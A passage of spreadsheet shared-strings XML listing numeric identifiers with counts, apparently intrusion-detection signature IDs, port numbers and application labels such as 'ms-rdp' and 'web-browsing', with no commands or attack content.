    <t>2008538, 2002752, 2002749, 2049400</t>
  </si>
  <si>
    <t>19779 (75), 2008538 (72), 15874 (15), 2002752 (2), 2002749 (2), 13990 (1), 1147 (1), 2049400 (1)</t>
  </si>
  <si>
    <t>19779, 2008538, 15874, 2002752, 2002749, 13990, 1147, 2049400</t>
  </si>
  <si>
    <t>1122 (1), 1147 (1)</t>
  </si>
  <si>
    <t>1122, 1147</t>
  </si>
  <si>
    <t>2008538 (72), 2049400 (1), 1122 (1), 1147 (1)</t>
  </si>
  <si>
    <t>2008538, 2049400, 1122, 1147</t>
  </si>
  <si>
    <t>46199</t>
  </si>
  <si>
    <t>36248, 58005</t>
  </si>
  <si>
    <t>30514, 31477, 32658, 33338, 35823, 36241, 36242, 38195, 54608, 59128, 91523, 91528, 94258, 94307</t>
  </si>
  <si>
    <t>57735</t>
  </si>
  <si>
    <t>1 (4), 12 (3)</t>
  </si>
  <si>
    <t>2021076 (12), 2022858 (8), 2016141 (8), 2018959 (6), 2035480 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2021076, 2022858, 2016141, 2018959, 2035480, 2025644</t>
  </si>
  <si>
    <t>15306 (12), 1917 (8), 50447 (8), 23861 (6), 16313 (6), 1 (4), 1200 (4), 12 (3), 58160 (2)</t>
  </si>
  <si>
    <t>15306, 1917, 50447, 23861, 16313, 1, 1200, 12, 58160</t>
  </si>
  <si>
    <t>2021076 (18), 2022858 (8), 2016141 (8), 2003595 (6), 2018959 (6), 2101200 (4), 2002752 (2), 2002749 (2), 2001117 (2), 2035480 (2), 2000419 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2021076, 2022858, 2016141, 2003595, 2018959, 2101200, 2002752, 2002749, 2001117, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>2021076 (18), 15306 (12), 1917 (8), 50447 (8), 2022858 (8), 2016141 (8), 23861 (6), 16313 (6), 2003595 (6), 2018959 (6), 1 (4), 1200 (4), 2101200 (4), 12 (3), 58160 (2), 2002752 (2), 2002749 (2), 2001117 (2), 2035480 (2), 2000419 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2021076, 15306, 1917, 50447, 2022858, 2016141, 23861, 16313, 2003595, 2018959, 1, 1200, 2101200, 12, 58160, 2002752, 2002749, 2001117, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>1917 (8), 1200 (4)</t>
  </si>
  <si>
    <t>1917, 1200</t>
  </si>
  <si>
    <t>2018959 (6), 2025644 (2)</t>
  </si>
  <si>
    <t>2018959, 2025644</t>
  </si>
  <si>
    <t>15306 (12), 50447 (8), 23861 (6), 16313 (6), 58160 (2)</t>
  </si>
  <si>
    <t>15306, 50447, 23861, 16313, 58160</t>
  </si>
  <si>
    <t>2003595 (6), 2018959 (6), 2000419 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2003595, 2018959, 2000419, 2025644</t>
  </si>
  <si>
    <t>15306 (12), 50447 (8), 23861 (6), 16313 (6), 2003595 (6), 2018959 (6), 58160 (2), 2000419 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>15306, 50447, 23861, 16313, 2003595, 2018959, 58160, 2000419, 2025644</t>
  </si>
  <si>
    <t>2021076 (12), 2016141 (8)</t>
  </si>
  <si>
    <t>2021076, 2016141</t>
  </si>
  <si>
    <t>2021076 (12), 2016141 (8), 1 (4), 12 (3)</t>
  </si>
  <si>
    <t>2021076, 2016141, 1, 12</t>
  </si>
  <si>
    <t>1 (4), 1200 (4), 12 (3)</t>
  </si>
  <si>
    <t>1, 1200, 12</t>
  </si>
  <si>
    <t>2021076 (18), 2016141 (8), 2101200 (4), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2021076, 2016141, 2101200, 2002752, 2002749</t>
  </si>
  <si>
    <t>2021076 (18), 2016141 (8), 1 (4), 1200 (4), 2101200 (4), 12 (3), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2021076, 2016141, 1, 1200, 2101200, 12, 2002752, 2002749</t>
  </si>
  <si>
    <t>1200 (4)</t>
  </si>
  <si>
    <t>2021076 (12), 2016141 (8), 1 (4), 1200 (4), 12 (3)</t>
  </si>
  <si>
    <t>2021076, 2016141, 1, 1200, 12</t>
  </si>
  <si>
    <t>2022858 (8), 2035480 (2)</t>
  </si>
  <si>
    <t>2022858, 2035480</t>
  </si>
  <si>
    <t>1917 (8)</t>
  </si>
  <si>
    <t>2022858 (8), 2001117 (2), 2035480 (2)</t>
  </si>
  <si>
    <t>2022858, 2001117, 2035480</t>
  </si>
  <si>
    <t>1917 (8), 2022858 (8), 2001117 (2), 2035480 (2)</t>
  </si>
  <si>
    <t>1917, 2022858, 2001117, 2035480</t>
  </si>
  <si>
    <t>2022858 (8), 1917 (8), 2035480 (2)</t>
  </si>
  <si>
    <t>2022858, 1917, 2035480</t>
  </si>
  <si>
    <t>12 (6), 1448 (2), 402 (1)</t>
  </si>
  <si>
    <t>12, 1448, 402</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2034857 (2), 2101447 (2), 2001329 (2), 2001330 (2), 2100402 (1), 2009207 (1), 2009206 (1), 2009205 (1), 2009208 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2034857, 2101447, 2001329, 2001330, 2100402, 2009207, 2009206, 2009205, 2009208</t>
  </si>
  <si>
    <t>12 (6), 1448 (2), 2002752 (2), 2002749 (2), 2034857 (2), 2101447 (2), 2001329 (2), 2001330 (2), 402 (1), 2100402 (1), 2009207 (1), 2009206 (1), 2009205 (1), 2009208 (1)</t>
  </si>
  <si>
    <t>12, 1448, 2002752, 2002749, 2034857, 2101447, 2001329, 2001330, 402, 2100402, 2009207, 2009206, 2009205, 2009208</t>
  </si>
  <si>
    <t>1448 (2), 402 (1)</t>
  </si>
  <si>
    <t>1448, 402</t>
  </si>
  <si>
    <t>2034857 (2), 2009207 (1), 2009206 (1), 2009205 (1), 2009208 (1)</t>
  </si>
  <si>
    <t>2034857, 2009207, 2009206, 2009205, 2009208</t>
  </si>
  <si>
    <t>12 (6), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2101447 (2), 2001329 (2), 2001330 (2), 2100402 (1)</t>
  </si>
  <si>
    <t>2101447, 2001329, 2001330, 2100402</t>
  </si>
  <si>
    <t>1448 (2), 2101447 (2), 2001329 (2), 2001330 (2), 402 (1), 2100402 (1)</t>
  </si>
  <si>
    <t>1448, 2101447, 2001329, 2001330, 402, 2100402</t>
  </si>
  <si>
    <t>2001330 (2), 1448 (2), 402 (1)</t>
  </si>
  <si>
    <t>2001330, 1448, 402</t>
  </si>
  <si>
    <t>33106</t>
  </si>
  <si>
    <t>15511</t>
  </si>
  <si>
    <t>2100527 (6), 2002752 (2), 2002749 (2), 2054218 (1)</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749, 2054218</t>
  </si>
  <si>
    <t>12 (6), 2100527 (6), 2002752 (2), 2002749 (2), 1325 (1), 2054218 (1)</t>
  </si>
  <si>
    <t>12, 2100527, 2002752, 2002749, 1325, 2054218</t>
  </si>
  <si>
    <t>12 (6), 2100527 (6), 2002752 (2), 2002749 (2), 2054218 (1)</t>
  </si>
  <si>
    <t>12, 2100527, 2002752, 2002749, 2054218</t>
  </si>
  <si>
    <t>7929858</t>
  </si>
  <si>
    <t>50447 (11058), 7070 (5505), 31939 (4), 1 (2), 5 (1)</t>
  </si>
  <si>
    <t>50447, 7070, 31939, 1, 5</t>
  </si>
  <si>
    <t>2009714 (5505), 2002749 (19), 2009004 (4)</t>
  </si>
  <si>
    <t>2009714, 2002749, 2009004</t>
  </si>
  <si>
    <t>50447 (11058), 7070 (5505), 2009714 (5505), 2002749 (19), 31939 (4), 2009004 (4), 1 (2), 5 (1)</t>
  </si>
  <si>
    <t>50447, 7070, 2009714, 2002749, 31939, 2009004, 1, 5</t>
  </si>
  <si>
    <t>50447 (11058), 7070 (5505), 31939 (4)</t>
  </si>
  <si>
    <t>50447, 7070, 31939</t>
  </si>
  <si>
    <t>2009714 (5505), 2009004 (4)</t>
  </si>
  <si>
    <t>2009714, 2009004</t>
  </si>
  <si>
    <t>50447 (11058), 7070 (5505), 2009714 (5505), 31939 (4), 2009004 (4)</t>
  </si>
  <si>
    <t>50447, 7070, 2009714, 31939, 2009004</t>
  </si>
  <si>
    <t>1 (2), 5 (1)</t>
  </si>
  <si>
    <t>1, 5</t>
  </si>
  <si>
    <t>2002749 (19)</t>
  </si>
  <si>
    <t>2002749 (19), 1 (2), 5 (1)</t>
  </si>
  <si>
    <t>2002749, 1, 5</t>
  </si>
  <si>
    <t>17702</t>
  </si>
  <si>
    <t>55310, 94328</t>
  </si>
  <si>
    <t>12 (2), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>44604 (31), 18 (23), 3 (23), 12 (14), 33 (2), 44489 (1)</t>
  </si>
  <si>
    <t>44604, 18, 3, 12, 33, 44489</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2059253 (1), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2059253, 2044666, 2059098, 2059099, 2059101, 2059109, 2059102, 2059100</t>
  </si>
  <si>
    <t>44604 (31), 18 (23), 3 (23), 12 (14), 33 (2), 2002752 (2), 2002749 (2), 44489 (1), 2059253 (1), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>44604, 18, 3, 12, 33, 2002752, 2002749, 44489, 2059253, 2044666, 2059098, 2059099, 2059101, 2059109, 2059102, 2059100</t>
  </si>
  <si>
    <t>44604 (31), 44489 (1)</t>
  </si>
  <si>
    <t>44604, 44489</t>
  </si>
  <si>
    <t>12 (14), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>18 (23), 3 (23), 33 (2)</t>
  </si>
  <si>
    <t>18, 3, 33</t>
  </si>
  <si>
    <t>2059253 (1), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>2059253, 2044666, 2059098, 2059099, 2059101, 2059109, 2059102, 2059100</t>
  </si>
  <si>
    <t>18 (23), 3 (23), 33 (2), 2059253 (1), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>18, 3, 33, 2059253, 2044666, 2059098, 2059099, 2059101, 2059109, 2059102, 2059100</t>
  </si>
  <si>
    <t>54410, 92322</t>
  </si>
  <si>
    <t>41978 (15), 12 (6), 18 (5), 42944 (1), 3 (1)</t>
  </si>
  <si>
    <t>41978, 12, 18, 42944, 3</t>
  </si>
  <si>
    <t>2102465 (2), 2035480 (2), 2025992 (1), 2025649 (1), 2025650 (1), 2024297 (1), 2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2102465, 2035480, 2025992, 2025649, 2025650, 2024297, 2018959, 2025644</t>
  </si>
  <si>
    <t>41978 (15), 1394 (13), 12 (6), 18 (5), 44489 (4), 15306 (2), 58160 (2), 44487 (1), 44485 (1), 5730 (1), 42944 (1), 3 (1)</t>
  </si>
  <si>
    <t>41978, 1394, 12, 18, 44489, 15306, 58160, 44487, 44485, 5730, 42944, 3</t>
  </si>
  <si>
    <t>2044666 (4), 2002752 (2), 2002749 (2), 2102465 (2), 2035480 (2), 2067085 (1), 2023997 (1), 2067087 (1), 2044665 (1), 2025992 (1), 2025649 (1), 2025650 (1), 2024766 (1), 2059098 (1), 2024297 (1), 2018959 (1), 2009080 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2044666, 2002752, 2002749, 2102465, 2035480, 2067085, 2023997, 2067087, 2044665, 2025992, 2025649, 2025650, 2024766, 2059098, 2024297, 2018959, 2009080, 2025644</t>
  </si>
  <si>
    <t>41978 (15), 1394 (13), 12 (6), 18 (5), 44489 (4), 2044666 (4), 15306 (2), 58160 (2), 2002752 (2), 2002749 (2), 2102465 (2), 2035480 (2), 44487 (1), 44485 (1), 5730 (1), 42944 (1), 3 (1), 2067085 (1), 2023997 (1), 2067087 (1), 2044665 (1), 2025992 (1), 2025649 (1), 2025650 (1), 2024766 (1), 2059098 (1), 2024297 (1), 2018959 (1), 2009080 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>41978, 1394, 12, 18, 44489, 2044666, 15306, 58160, 2002752, 2002749, 2102465, 2035480, 44487, 44485, 5730, 42944, 3, 2067085, 2023997, 2067087, 2044665, 2025992, 2025649, 2025650, 2024766, 2059098, 2024297, 2018959, 2009080, 2025644</t>
  </si>
  <si>
    <t>41978 (15), 42944 (1)</t>
  </si>
  <si>
    <t>41978 (15), 1394 (13), 42944 (1)</t>
  </si>
  <si>
    <t>41978, 1394, 42944</t>
  </si>
  <si>
    <t>2025992 (1), 2025649 (1), 2025650 (1), 2024297 (1), 2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2025992, 2025649, 2025650, 2024297, 2018959, 2025644</t>
  </si>
  <si>
    <t>41978 (15), 42944 (1), 2025992 (1), 2025649 (1), 2025650 (1), 2024297 (1), 2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>41978, 42944, 2025992, 2025649, 2025650, 2024297, 2018959, 2025644</t>
  </si>
  <si>
    <t>41978 (15), 1394 (13), 44489 (4), 15306 (2), 58160 (2), 44487 (1), 44485 (1), 42944 (1)</t>
  </si>
  <si>
    <t>41978, 1394, 44489, 15306, 58160, 44487, 44485, 42944</t>
  </si>
  <si>
    <t>2025992 (1), 2025649 (1), 2025650 (1), 2024766 (1), 2024297 (1), 2018959 (1), 2009080 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2025992, 2025649, 2025650, 2024766, 2024297, 2018959, 2009080, 2025644</t>
  </si>
  <si>
    <t>41978 (15), 1394 (13), 44489 (4), 15306 (2), 58160 (2), 44487 (1), 44485 (1), 42944 (1), 2025992 (1), 2025649 (1), 2025650 (1), 2024766 (1), 2024297 (1), 2018959 (1), 2009080 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>41978, 1394, 44489, 15306, 58160, 44487, 44485, 42944, 2025992, 2025649, 2025650, 2024766, 2024297, 2018959, 2009080, 2025644</t>
  </si>
  <si>
    <t>41978 (15), 1394 (13), 42944 (1), 2025992 (1), 2025649 (1), 2025650 (1), 2024297 (1), 2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>41978, 1394, 42944, 2025992, 2025649, 2025650, 2024297, 2018959, 2025644</t>
  </si>
  <si>
    <t>18 (5), 3 (1)</t>
  </si>
  <si>
    <t>2102465 (2), 2035480 (2)</t>
  </si>
  <si>
    <t>2102465, 2035480</t>
  </si>
  <si>
    <t>18 (5), 2102465 (2), 2035480 (2), 3 (1)</t>
  </si>
  <si>
    <t>18, 2102465, 2035480, 3</t>
  </si>
  <si>
    <t>18 (5), 5730 (1), 3 (1)</t>
  </si>
  <si>
    <t>18, 5730, 3</t>
  </si>
  <si>
    <t>2044666 (4), 2102465 (2), 2035480 (2), 2067085 (1), 2023997 (1), 2067087 (1), 2044665 (1), 2059098 (1)</t>
  </si>
  <si>
    <t>2044666, 2102465, 2035480, 2067085, 2023997, 2067087, 2044665, 2059098</t>
  </si>
  <si>
    <t>18 (5), 2044666 (4), 2102465 (2), 2035480 (2), 5730 (1), 3 (1), 2067085 (1), 2023997 (1), 2067087 (1), 2044665 (1), 2059098 (1)</t>
  </si>
  <si>
    <t>18, 2044666, 2102465, 2035480, 5730, 3, 2067085, 2023997, 2067087, 2044665, 2059098</t>
  </si>
  <si>
    <t>43799</t>
  </si>
  <si>
    <t>31696, 31710, 86360, 95608</t>
  </si>
  <si>
    <t>90807</t>
  </si>
  <si>
    <t>34447 (2), 12 (2), 18 (2), 34225 (1), 34224 (1), 50447 (1), 3 (1)</t>
  </si>
  <si>
    <t>34447, 12, 18, 34225, 34224, 50447, 3</t>
  </si>
  <si>
    <t>2010732 (4), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2010732, 2002752, 2002749</t>
  </si>
  <si>
    <t>2010732 (4), 34447 (2), 12 (2), 18 (2), 2002752 (2), 2002749 (2), 34225 (1), 34224 (1), 50447 (1), 3 (1)</t>
  </si>
  <si>
    <t>2010732, 34447, 12, 18, 2002752, 2002749, 34225, 34224, 50447, 3</t>
  </si>
  <si>
    <t>34447 (2), 34225 (1), 34224 (1), 50447 (1)</t>
  </si>
  <si>
    <t>34447, 34225, 34224, 50447</t>
  </si>
  <si>
    <t>2010732 (4), 12 (2), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2010732, 12, 2002752, 2002749</t>
  </si>
  <si>
    <t>40511</t>
  </si>
  <si>
    <t>15896, 34040</t>
  </si>
  <si>
    <t>37700</t>
  </si>
  <si>
    <t>38390, 86533</t>
  </si>
  <si>
    <t>50447 (13108), 40890 (6548), 31939 (6548)</t>
  </si>
  <si>
    <t>50447, 40890, 31939</t>
  </si>
  <si>
    <t>2009004 (6548), 2002749 (22)</t>
  </si>
  <si>
    <t>2009004, 2002749</t>
  </si>
  <si>
    <t>2009004 (6548)</t>
  </si>
  <si>
    <t>2009004</t>
  </si>
  <si>
    <t>50447 (13108), 40890 (6548), 31939 (6548), 2009004 (6548)</t>
  </si>
  <si>
    <t>50447, 40890, 31939, 2009004</t>
  </si>
  <si>
    <t>2002749 (22)</t>
  </si>
  <si>
    <t>2002749 (2), 33 (1), 18 (1), 3 (1)</t>
  </si>
  <si>
    <t>2002749, 33, 18, 3</t>
  </si>
  <si>
    <t>35766</t>
  </si>
  <si>
    <t>16195</t>
  </si>
  <si>
    <t>ssl, web-browsing</t>
  </si>
  <si>
    <t>15921</t>
  </si>
  <si>
    <t>33 (26), 18 (26), 3 (23), 24094 (22), 15 (21), 12 (18), 24097 (8), 24096 (8), 59597 (6), 254 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 24094, 15, 12, 24097, 24096, 59597, 254</t>
  </si>
  <si>
    <t>2002749 (27), 2060630 (2), 2002752 (1), 2059172 (1), 2060632 (1)</t>
  </si>
  <si>
    <t>2002749, 2060630, 2002752, 2059172, 2060632</t>
  </si>
  <si>
    <t>2002749 (27), 33 (26), 18 (26), 3 (23), 24094 (22), 15 (21), 12 (18), 24097 (8), 24096 (8), 59597 (6), 2060630 (2), 254 (1), 2002752 (1), 2059172 (1), 2060632 (1)</t>
  </si>
  <si>
    <t>2002749, 33, 18, 3, 24094, 15, 12, 24097, 24096, 59597, 2060630, 254, 2002752, 2059172, 2060632</t>
  </si>
  <si>
    <t>24094 (22), 24097 (8), 24096 (8), 59597 (6)</t>
  </si>
  <si>
    <t>24094, 24097, 24096, 59597</t>
  </si>
  <si>
    <t>15 (21), 12 (18)</t>
  </si>
  <si>
    <t>15 (21), 12 (18), 254 (1)</t>
  </si>
  <si>
    <t>15, 12, 254</t>
  </si>
  <si>
    <t>2002749 (27), 2002752 (1)</t>
  </si>
  <si>
    <t>2002749 (27), 15 (21), 12 (18), 254 (1), 2002752 (1)</t>
  </si>
  <si>
    <t>2002749, 15, 12, 254, 2002752</t>
  </si>
  <si>
    <t>33 (26), 18 (26), 3 (23)</t>
  </si>
  <si>
    <t>2060630 (2), 2059172 (1), 2060632 (1)</t>
  </si>
  <si>
    <t>2060630, 2059172, 2060632</t>
  </si>
  <si>
    <t>33 (26), 18 (26), 3 (23), 2060630 (2), 2059172 (1), 2060632 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 2060630, 2059172, 2060632</t>
  </si>
  <si>
    <t>15921, 39630</t>
  </si>
  <si>
    <t>14984, 32880, 54319, 56101, 56396, 9999</t>
  </si>
  <si>
    <t>50447 (6), 1917 (4), 402 (3), 46979 (1), 58160 (1), 12 (1)</t>
  </si>
  <si>
    <t>50447, 1917, 402, 46979, 58160, 12</t>
  </si>
  <si>
    <t>2002752 (3), 2002749 (3), 2009768 (3), 2100402 (3), 2031379 (1), 2041131 (1), 2013491 (1), 2013490 (1), 2016141 (1), 2003595 (1), 2035480 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2009768, 2100402, 2031379, 2041131, 2013491, 2013490, 2016141, 2003595, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>50447 (6), 1917 (4), 402 (3), 2002752 (3), 2002749 (3), 2009768 (3), 2100402 (3), 46979 (1), 58160 (1), 12 (1), 2031379 (1), 2041131 (1), 2013491 (1), 2013490 (1), 2016141 (1), 2003595 (1), 2035480 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>50447, 1917, 402, 2002752, 2002749, 2009768, 2100402, 46979, 58160, 12, 2031379, 2041131, 2013491, 2013490, 2016141, 2003595, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>1917 (4), 402 (3), 46979 (1)</t>
  </si>
  <si>
    <t>1917, 402, 46979</t>
  </si>
  <si>
    <t>2025644 (1)</t>
  </si>
  <si>
    <t>50447 (6), 58160 (1)</t>
  </si>
  <si>
    <t>50447, 58160</t>
  </si>
  <si>
    <t>2003595 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2003595, 2000419, 2025644</t>
  </si>
  <si>
    <t>50447 (6), 58160 (1), 2003595 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>50447, 58160, 2003595, 2000419, 2025644</t>
  </si>
  <si>
    <t>2031379 (1), 2016141 (1)</t>
  </si>
  <si>
    <t>2031379, 2016141</t>
  </si>
  <si>
    <t>12 (1), 2031379 (1), 2016141 (1)</t>
  </si>
  <si>
    <t>12, 2031379, 2016141</t>
  </si>
  <si>
    <t>2002752 (3), 2002749 (3), 2009768 (3), 2031379 (1), 2016141 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2009768, 2031379, 2016141</t>
  </si>
  <si>
    <t>2002752 (3), 2002749 (3), 2009768 (3), 12 (1), 2031379 (1), 2016141 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2009768, 12, 2031379, 2016141</t>
  </si>
  <si>
    <t>2041131 (1), 2035480 (1)</t>
  </si>
  <si>
    <t>2041131, 2035480</t>
  </si>
  <si>
    <t>2100402 (3), 2041131 (1), 2013491 (1), 2013490 (1), 2035480 (1)</t>
  </si>
  <si>
    <t>2100402, 2041131, 2013491, 2013490, 2035480</t>
  </si>
  <si>
    <t>1917 (4), 402 (3), 2100402 (3), 46979 (1), 2041131 (1), 2013491 (1), 2013490 (1), 2035480 (1)</t>
  </si>
  <si>
    <t>1917, 402, 2100402, 46979, 2041131, 2013491, 2013490, 2035480</t>
  </si>
  <si>
    <t>1917 (4), 402 (3), 2041131 (1), 2035480 (1), 46979 (1)</t>
  </si>
  <si>
    <t>1917, 402, 2041131, 2035480, 46979</t>
  </si>
  <si>
    <t>44604 (3), 18 (1), 3 (1)</t>
  </si>
  <si>
    <t>44604, 18, 3</t>
  </si>
  <si>
    <t>44604 (3), 2002752 (2), 2002749 (2), 18 (1), 3 (1)</t>
  </si>
  <si>
    <t>44604, 2002752, 2002749, 18, 3</t>
  </si>
  <si>
    <t>44604 (3)</t>
  </si>
  <si>
    <t>44604</t>
  </si>
  <si>
    <t>56497</t>
  </si>
  <si>
    <t>1917 (12), 12 (5), 58160 (1)</t>
  </si>
  <si>
    <t>1917, 12, 58160</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2035480 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>1917 (12), 12 (5), 2002752 (2), 2002749 (2), 58160 (1), 2035480 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>1917, 12, 2002752, 2002749, 58160, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>58160 (1)</t>
  </si>
  <si>
    <t>58160</t>
  </si>
  <si>
    <t>2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>58160 (1), 2000419 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>58160, 2000419, 2025644</t>
  </si>
  <si>
    <t>2035480 (1)</t>
  </si>
  <si>
    <t>1917 (12), 2035480 (1)</t>
  </si>
  <si>
    <t>1917, 2035480</t>
  </si>
  <si>
    <t>254 (2), 33 (2), 18 (2), 3 (2)</t>
  </si>
  <si>
    <t>254, 33, 18, 3</t>
  </si>
  <si>
    <t>2002749 (4), 2002752 (2)</t>
  </si>
  <si>
    <t>2002749 (4), 254 (2), 33 (2), 18 (2), 3 (2), 2002752 (2)</t>
  </si>
  <si>
    <t>2002749, 254, 33, 18, 3, 2002752</t>
  </si>
  <si>
    <t>2002749 (4), 254 (2), 2002752 (2)</t>
  </si>
  <si>
    <t>2002749, 254, 2002752</t>
  </si>
  <si>
    <t>632447088</t>
  </si>
  <si>
    <t>github-base</t>
  </si>
  <si>
    <t>2100402 (21), 2002749 (19), 2100254 (8), 2060507 (6), 2002752 (2), 2013514 (1)</t>
  </si>
  <si>
    <t>2100402, 2002749, 2100254, 2060507, 2002752, 2013514</t>
  </si>
  <si>
    <t>402 (669), 54827 (21), 2100402 (21), 2002749 (19), 2100254 (8), 2060507 (6), 2002752 (2), 2013514 (1)</t>
  </si>
  <si>
    <t>402, 54827, 2100402, 2002749, 2100254, 2060507, 2002752, 2013514</t>
  </si>
  <si>
    <t>2013514 (1)</t>
  </si>
  <si>
    <t>54827 (21), 2013514 (1)</t>
  </si>
  <si>
    <t>54827, 2013514</t>
  </si>
  <si>
    <t>2002749 (19), 2100254 (8), 2002752 (2)</t>
  </si>
  <si>
    <t>2002749, 2100254, 2002752</t>
  </si>
  <si>
    <t>2100402 (21), 2060507 (6)</t>
  </si>
  <si>
    <t>2100402, 2060507</t>
  </si>
  <si>
    <t>402 (669), 2100402 (21), 2060507 (6)</t>
  </si>
  <si>
    <t>402, 2100402, 2060507</t>
  </si>
  <si>
    <t>2100402 (12), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2100402, 2002752, 2002749</t>
  </si>
  <si>
    <t>402 (12), 2100402 (12), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>402, 2100402, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100402 (12)</t>
  </si>
  <si>
    <t>2100402</t>
  </si>
  <si>
    <t>402 (12), 2100402 (12)</t>
  </si>
  <si>
    <t>402, 2100402</t>
  </si>
  <si>
    <t>2100408 (1002), 2100527 (1), 2002752 (1), 2002749 (1)</t>
  </si>
  <si>
    <t>2100408, 2100527, 2002752, 2002749</t>
  </si>
  <si>
    <t>408 (1002), 2100408 (1002), 2100527 (1), 2002752 (1), 2002749 (1)</t>
  </si>
  <si>
    <t>408, 2100408, 2100527, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100527 (1), 2002752 (1), 2002749 (1)</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100408 (1002)</t>
  </si>
  <si>
    <t>2100408</t>
  </si>
  <si>
    <t>408 (1002), 2100408 (1002)</t>
  </si>
  <si>
    <t>408, 2100408</t>
  </si>
  <si>
    <t>2002749 (110), 2019348 (63)</t>
  </si>
  <si>
    <t>2002749, 2019348</t>
  </si>
  <si>
    <t>107347977</t>
  </si>
  <si>
    <t>50447 (200362), 21513 (173882)</t>
  </si>
  <si>
    <t>50447, 21513</t>
  </si>
  <si>
    <t>2015526 (67110), 2002828 (67110), 2014153 (540), 2002829 (419), 2002749 (90)</t>
  </si>
  <si>
    <t>2015526, 2002828, 2014153, 2002829, 2002749</t>
  </si>
  <si>
    <t>50447 (200362), 21513 (173882), 2015526 (67110), 2002828 (67110), 2014153 (540), 2002829 (419), 2002749 (90)</t>
  </si>
  <si>
    <t>50447, 21513, 2015526, 2002828, 2014153, 2002829, 2002749</t>
  </si>
  <si>
    <t>50447 (200362)</t>
  </si>
  <si>
    <t>21513 (173882)</t>
  </si>
  <si>
    <t>21513</t>
  </si>
  <si>
    <t>2015526 (67110), 2014153 (540), 2002829 (419), 2002749 (90)</t>
  </si>
  <si>
    <t>2015526, 2014153, 2002829, 2002749</t>
  </si>
  <si>
    <t>21513 (173882), 2015526 (67110), 2014153 (540), 2002829 (419), 2002749 (90)</t>
  </si>
  <si>
    <t>21513, 2015526, 2014153, 2002829, 2002749</t>
  </si>
  <si>
    <t>2002828 (67110)</t>
  </si>
  <si>
    <t>2002828</t>
  </si>
  <si>
    <t>30952</t>
  </si>
  <si>
    <t>15893, 34038</t>
  </si>
  <si>
    <t>14984, 34767, 9999</t>
  </si>
  <si>
    <t>40032</t>
  </si>
  <si>
    <t>web-browsing, web-crawler</t>
  </si>
  <si>
    <t>2100525 (60172), 2100402 (15), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2100525, 2100402, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100525 (60172), 402 (15), 2100402 (15), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2100525, 402, 2100402, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100525 (60172), 2100402 (15)</t>
  </si>
  <si>
    <t>2100525, 2100402</t>
  </si>
  <si>
    <t>2100525 (60172), 402 (15), 2100402 (15)</t>
  </si>
  <si>
    <t>2100525, 402, 2100402</t>
  </si>
  <si>
    <t>12525</t>
  </si>
  <si>
    <t>16206</t>
  </si>
  <si>
    <t>402 (61)</t>
  </si>
  <si>
    <t>402 (61), 2002749 (20)</t>
  </si>
  <si>
    <t>402, 2002749</t>
  </si>
  <si>
    <t>ms-rdp</t>
  </si>
  <si>
    <t>402 (60)</t>
  </si>
  <si>
    <t>402 (60), 2002749 (20)</t>
